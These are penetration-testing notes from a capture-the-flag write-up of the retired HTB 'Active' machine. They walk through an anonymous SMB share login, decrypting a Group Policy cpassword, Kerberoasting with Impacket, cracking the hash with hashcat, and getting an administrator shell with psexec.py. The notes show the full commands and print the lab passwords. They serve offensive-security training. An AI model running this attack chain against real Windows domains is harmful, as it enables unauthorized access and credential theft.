Buy me a tea

GPP/cPassword Attacks

  • GPP will keep passwords in an XML file

  • Works with smb

  • If we find a 334 open we can try to login anonymously Example from HTB - Active - Retired Machine

  • Tips: prompt off (will not prompt when dl file) and recurse on (will list everything)

    ┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                5217023 blocks of size 4096. 260455 blocks available
smb: \> prompt off
smb: \>

  • We can get all the file using mget *

  • We are interested in the group.xml file which has been downloaded in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/

  • We can just copy cpassword and crackit using gpp-decrypt: gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ And we get the password: GPPstillStandingStrong2k18

HTB - Active - privesc

  • The password obtain with gpp only gave us user. To root the machine we use kerberoasting again:

    ┌──(kali㉿kali)-[~]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2022-02-11 16:21:53 

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1

  • We can then crack the password with hashcat

    ┌──(root💀kali)-[~/active-directory]
└─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
[STRIPPED]
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968

  • And finally get shell using psexec.py (Impacket)

    ┌──(root💀kali)-[~/active-directory]
└─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100

GPP - Resources

LogoPentesting in the Real World: Group Policy Pwnage | Rapid7 BlogRapid7
Group Policy Pwnage
PreviousKerberosNextURL File Attack

Last updated